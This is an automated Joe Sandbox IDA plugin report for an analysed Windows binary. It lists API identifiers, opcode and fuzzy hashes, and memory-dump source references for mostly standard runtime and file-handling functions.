                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_isindst
                                                                    • String ID:
                                                                    • API String ID: 4170891091-0
                                                                    • Opcode ID: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                    • Instruction ID: 80e2facaa18845832926c4e00c9cf8b956f6016d9bfdefbd820f2008ebc96e1e
                                                                    • Opcode Fuzzy Hash: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                    • Instruction Fuzzy Hash: AD51C273F242118AEB18CF6599556BC2BA5BF0136CF502739DE1E92AE5EF39B401C700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 1452418845-0
                                                                    • Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                    • Instruction ID: 19a29705b31335b599ce6929db759c519194dbfe6f5c4a231ec95602e13dfba8
                                                                    • Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                    • Instruction Fuzzy Hash: 8B315923E3D14261FA24AFA4A4513B92381AF55788F487E35E94EC76D7FE2CB8048219
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1279662727-0
                                                                    • Opcode ID: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
                                                                    • Instruction ID: 9c0b2f8d38f0d2b8648b5248ae6ad30baef9af6b54be4608d027d36714965c6d
                                                                    • Opcode Fuzzy Hash: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
                                                                    • Instruction Fuzzy Hash: 9641B123D2878283E7508F6495183AD6370FF94768F10A735EA9C8BAD5EF6DF1A08700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
                                                                    • Instruction ID: 222c55ffabafbae71a1cfae65c0f10c034e279faa243d29fb37735f99547adee
                                                                    • Opcode Fuzzy Hash: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
                                                                    • Instruction Fuzzy Hash: DCD01C12B2920B42EA28AF31198A03C02116F8C708F403E38C80A93387ED3EB81A8200
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryMessage
                                                                    • String ID: Security descriptor is not initialized!
                                                                    • API String ID: 73271072-986317556
                                                                    • Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                    • Instruction ID: a556efd0a4860ba7fc9fba48105996e25005b9c006741db663a94ef5e74a09fa
                                                                    • Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                    • Instruction Fuzzy Hash: 4BE092B2A28B0686EA209F24E8446692290FB55354F842734E55CC73E4FF3CF1098B40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                    • Instruction ID: 6634a36233fcc233317838abb9d722e3b5d378a84b7d7db16af1774061861a0e
                                                                    • Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                    • Instruction Fuzzy Hash: 3F510763B2925186FB24DE26950067E7685BF44BACF246F34DDAC977C5EE3EF4018600
                                                                    APIs
                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF67D01B099,?,?,00000000,00007FF67D01B14E), ref: 00007FF67D01B28A
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF67D01B099,?,?,00000000,00007FF67D01B14E), ref: 00007FF67D01B294
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                                    • String ID:
                                                                    • API String ID: 1687624791-0
                                                                    • Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                    • Instruction ID: 332dfe09540aa1c69e7ef407ed5fc24eae633637c025cc03c27771bd9b8e187e
                                                                    • Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                    • Instruction Fuzzy Hash: DD21F623B3868201FAA09F61949427D2A826F867A8F446B34DA2DC73D5FF6DF4489301
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                    • Instruction ID: 9b0bd2a49ef5da6de593e2b174880ded3885a4319576ef62e18cfb771e40af84
                                                                    • Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                    • Instruction Fuzzy Hash: C111EF22A28B8181EA108F25A44406DA361FB44BF8F542731EE7D8B7E9EF7CF0408744
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67D018039), ref: 00007FF67D0181DF
                                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67D018039), ref: 00007FF67D0181F5
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Time$System$FileLocalSpecific
                                                                    • String ID:
                                                                    • API String ID: 1707611234-0
                                                                    • Opcode ID: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
                                                                    • Instruction ID: 13db99ab5a45af39ce369dce5e6782ab82796275804644c76f29c5b53e178b9c
                                                                    • Opcode Fuzzy Hash: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
                                                                    • Instruction Fuzzy Hash: 11017C2392C65282E7508F14A40123EB7B0FB857A5F602736EAAD815D8EF3DE144CB00
                                                                    APIs
                                                                    • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B022
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B02C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: BoundaryDeleteDescriptorErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2050971199-0
                                                                    • Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                    • Instruction ID: 0efc3323b7cbe67cc60c195e51014721da58329019b177de91177c9f771cb076
                                                                    • Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                    • Instruction Fuzzy Hash: 4EE08C12F2930382FF1AAFB6988943C19A15F88709F406E34CE1DCB296FE3DB8854650
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryErrorLastRemove
                                                                    • String ID:
                                                                    • API String ID: 377330604-0
                                                                    • Opcode ID: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                    • Instruction ID: 240208a888c02533800f3a0e161d2b9aa2b11b836814eb2ddf1aacbd268973dd
                                                                    • Opcode Fuzzy Hash: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                    • Instruction Fuzzy Hash: 65D0C912E3E603C2E6546F76188903E15A02F88768F502F74C02EC01D0FE2DB4890151
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2018770650-0
                                                                    • Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                    • Instruction ID: f07b31fb7da3ba2e37a0fe977fc45103de99ffc60571136d8a015666585d6f1a
                                                                    • Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
                                                                    • Instruction Fuzzy Hash: FAD0C912E3A60391E6547F76188503D15A02F58B69F502F30C02DC21D0FE2DF1491112
                                                                    APIs
                                                                      • Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A
                                                                    • _findclose.LIBCMT ref: 00007FF67D007FA9
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_findclose
                                                                    • String ID:
                                                                    • API String ID: 2772937645-0
                                                                    • Opcode ID: 86611e6ebc2e161ed5fe30ba56aa598d30f03ea69cc12a76f586bf5c99a3238f
                                                                    • Instruction ID: fbbcc1223eeb3bc90a6dd7b5890baf4c4853fa978ebbd2fb33d75da0caa394b4
                                                                    • Opcode Fuzzy Hash: 86611e6ebc2e161ed5fe30ba56aa598d30f03ea69cc12a76f586bf5c99a3238f
                                                                    • Instruction Fuzzy Hash: 65716953E28AC581EA11CF2CD5092FD6360F7A8B88F54E721DB8C52592FF28E2D9C740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
                                                                    • Instruction ID: 28b7735eb13ca89a376c48b33de6ee6ab7a26326c2419c91bd6984df3da6c1f0
                                                                    • Opcode Fuzzy Hash: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
                                                                    • Instruction Fuzzy Hash: D641F373A2824183EA24DE19E55027DB3A0EB55748F102B35D68EC3691EF3EF442C750
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 840049012-0
                                                                    • Opcode ID: 261b6aa2baab1fe210e6955bbdd347d680c16595553269c070d03284900824a2
                                                                    • Instruction ID: a0a6f632e5c88516a57602cc71a0a3fd140c88d7fb333657696d1f8ab73fb608
                                                                    • Opcode Fuzzy Hash: 261b6aa2baab1fe210e6955bbdd347d680c16595553269c070d03284900824a2
                                                                    • Instruction Fuzzy Hash: 3221E423B3825255FA14EE1268143BEA655FF85BD8F882930EE4C87786EE7DF001C304
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
                                                                    • Instruction ID: 1d930ed908da908fce10e695d7b70ce5c270fa5780b0aa5e917e44da28ca2d9e
                                                                    • Opcode Fuzzy Hash: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
                                                                    • Instruction Fuzzy Hash: 5F31D523E3875285F752AF55884137C6A60AF44B98F412B35EA1C8B3D2EF7EF4418715
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                    • String ID:
                                                                    • API String ID: 3947729631-0
                                                                    • Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                    • Instruction ID: 84b3987ac3f6981dc05769d50270ee7411c105a90107924b5fa459a215c3ac47
                                                                    • Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
                                                                    • Instruction Fuzzy Hash: 4C217F32A247468AEB268F64C4402EC37A0EB0471CF441B35D61D87AC5FF39E565CB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                    • Instruction ID: ba086c90d1125e702537f469ca82e761f4524a0b18815c85a87c1cbc8bf8d54a
                                                                    • Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
                                                                    • Instruction Fuzzy Hash: 9B117B67A2C74181EF50DF51981127DA764BF85B88F845E31EA4D9768AEF7EF4408700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
                                                                    • Instruction ID: 67a1e4042f076e70061b751c98d47134e35fefce944b31d2d9192db0c359379a
                                                                    • Opcode Fuzzy Hash: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
                                                                    • Instruction Fuzzy Hash: 7021BE33A29A8187DB61CF18E44076976A0EB84B68F645734EA5D876D9EF3DF8008B00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
